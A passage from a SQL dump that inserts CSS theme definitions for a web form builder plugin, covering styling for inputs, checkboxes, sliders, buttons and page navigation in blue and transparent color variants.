text-align: left;\r\n	font-size: 23px;\r\nmargin: 16px 10px 5px 0px;\r\n}\r\n\r\n.wdform_section_break {\r\n	color: #E9B500;\r\n	font-size: 23px;\r\nmargin: 16px 0px;\r\n\r\n}\r\n\r\n.wdform-section-break-div\r\n{\r\nborder-top:1px solid #7F7F7F !important;\r\n}\r\n\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 24px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nbackground: #F8F8F8;\r\nborder: 1px solid #B7B7B7;\r\n	outline: none;\r\n}\r\ninput[type="text"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type="text"]:focus{\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #8B8B8B;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\ncursor: pointer;\r\n-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\nfilter: alpha(opacity=0);\r\nopacity: 0;\r\ncontent: "";\r\nposition: absolute;\r\nwidth: 13px;\r\nheight: 9px;\r\nbackground: url([SITE_ROOT]/images/09/checkbox.png) no-repeat;\r\nborder-radius: 0px;\r\ntop: 1px;\r\nleft: 2px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #8B8B8B;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #8B8B8B;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\ncolor: #808080;\r\nbackground-color: #E5E5E5;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 27px;\r\ntext-align: center;\r\nvertical-align: bottom;\r\npadding: 5px 25px 0px 25px;\r\nfont-size: 18px;\r\nmargin-left:3px;\r\nmargin-bottom:2px;\r\n}\r\n.page_active {\r\n	color: #C2C2C2;\r\ncursor: pointer;\r\nbackground-color: #FFFFFF;\r\ndisplay: inline-block;\r\nvertical-align: bottom;\r\nheight: 29px;\r\ntext-align: center;\r\nfont-size: 22px;\r\npadding: 5px 25px 0px 25px;\r\nborder: 1px solid #7F7F7F;\r\nmargin-left:3px;\r\nmargin-bottom: -1px;\r\nborder-bottom: none;\r\nline-height: 26px;\r\n}\r\n.page_percentage_active {\r\npadding: 0px;\r\nborder-spacing: 0px;\r\nheight: 10px;\r\nbackground: #E7C85C;\r\nfloat: left;\r\n}\r\n.page_percentage_deactive {\r\nheight: 10px;\r\nline-height: 20px;\r\nbackground-color: #E5E5E5;\r\ntext-align: left !important;\r\nmargin-bottom: 2px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n}\r\n\r\n.wdform_percentage_text {\r\ncolor: #fff;\r\nfont-size: 12px;\r\nposition: relative;\r\nbackground: url([SITE_ROOT]/images/09/02/02.png) no-repeat;\r\nwidth: 36px;\r\ndisplay: inline-block;\r\nheight: 36px;\r\ntop: -37px;\r\nleft: 17px;\r\ntext-align: center;\r\nline-height: 27px;\r\nfloat: right;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}', 0);
INSERT INTO `cyb_formmaker_themes` (`id`, `title`, `css`, `default`) VALUES
(33, 'Theme 09 blue', '.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #DDDDDD;\r\nborder: 1px solid #015875;\r\nmargin-bottom: 10px;\r\ncolor: #015875;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-spinner-button\r\n{\r\nborder-radius:0px !important;\r\nbackground: none!important;\r\n}\r\n\r\na.ui-slider-handle {\r\nwidth: 13px;\r\nheight: 13px;\r\ntop: -4px;\r\nborder: 0px;\r\nborder-radius: 13px;\r\nbackground: #FAFAFA;\r\nborder: 3px solid #B1B1B1;\r\noutline: none;\r\n}\r\n\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F5F5F5 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #000;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\n\r\n\r\n.ui-slider-range {\r\n	background: #015875 !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\nborder-top: 1px solid #7F7F7F !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F8F8F8;\r\n	border: 1px solid #B7B7B7;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/09/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/09/02/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background: url([SITE_ROOT]/images/09/next.png) no-repeat right;\r\n	padding: 0px 36px 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n        border: 1px solid #CECECE;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	 background: url([SITE_ROOT]/images/09/previous.png) no-repeat left;\r\n	padding: 0 20px 0 36px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border: 1px solid #CECECE;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #015875;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n		border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: #DDDDDD;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\npadding:10px;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_section_break2 {\r\n	color: #015875;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 23px;\r\nmargin: 16px 10px 40px 0px;\r\n}\r\n\r\n.wdform_section_break {\r\n	color: #015875;\r\n	font-size: 23px;\r\nmargin: 16px 0px;\r\n\r\n}\r\n\r\n.wdform-section-break-div\r\n{\r\nborder-top:1px solid #80ABBA !important;\r\n}\r\n\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 24px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nbackground: #F8F8F8;\r\nborder: 1px solid #B7B7B7;\r\n	outline: none;\r\n}\r\ninput[type="text"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type="text"]:focus{\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #8B8B8B;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\ncursor: pointer;\r\n-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\nfilter: alpha(opacity=0);\r\nopacity: 0;\r\ncontent: "";\r\nposition: absolute;\r\nwidth: 13px;\r\nheight: 9px;\r\nbackground: url([SITE_ROOT]/images/09/checkbox.png) no-repeat;\r\nborder-radius: 0px;\r\ntop: 1px;\r\nleft: 2px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #8B8B8B;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #8B8B8B;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\ncolor: #808080;\r\nbackground-color: #DEE9EC;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 27px;\r\ntext-align: center;\r\nvertical-align: bottom;\r\npadding: 5px 25px 0px 25px;\r\nfont-size: 18px;\r\nmargin-left:3px;\r\nmargin-bottom:2px;\r\n}\r\n.page_active {\r\n	color: #C2C2C2;\r\ncursor: pointer;\r\nbackground-color: #FFFFFF;\r\ndisplay: inline-block;\r\nvertical-align: bottom;\r\nheight: 29px;\r\ntext-align: center;\r\nfont-size: 22px;\r\npadding: 5px 25px 0px 25px;\r\nborder: 1px solid #7F7F7F;\r\nmargin-left:3px;\r\nmargin-bottom: -1px;\r\nborder-bottom: none;\r\nline-height: 26px;\r\n}\r\n.page_percentage_active {\r\npadding: 0px;\r\nborder-spacing: 0px;\r\nheight: 10px;\r\nbackground: #5C90A2;\r\nfloat: left;\r\n}\r\n.page_percentage_deactive {\r\nheight: 10px;\r\nline-height: 20px;\r\nbackground-color: #E5E5E5;\r\ntext-align: left !important;\r\nmargin-bottom: 2px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n}\r\n\r\n.wdform_percentage_text {\r\ncolor: #fff;\r\nfont-size: 12px;\r\nposition: relative;\r\nbackground: url([SITE_ROOT]/images/09/03/02.png) no-repeat;\r\nwidth: 36px;\r\ndisplay: inline-block;\r\nheight: 36px;\r\ntop: -37px;\r\nleft: 17px;\r\ntext-align: center;\r\nline-height: 27px;\r\nfloat: right;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}', 0),
(34, 'Theme 09 transparent (lightgreen button)', '.radio-div input[type="radio"],\r\n.checkbox-div input[type="checkbox"]\r\n{\r\nvisibility: hidden;\r\n}\r\n.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #30D1B1;\r\nmargin-bottom: 10px;\r\ncolor: #30D1B1;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-spinner-button\r\n{\r\nborder-radius:0px !important;\r\nbackground: none!important;\r\n}\r\n\r\na.ui-slider-handle {\r\nwidth: 13px;\r\nheight: 13px;\r\ntop: -4px;\r\nborder: 0px;\r\nborder-radius: 13px;\r\nbackground: #FAFAFA;\r\nborder: 3px solid #B1B1B1;\r\noutline: none;\r\n}\r\n\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F5F5F5 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	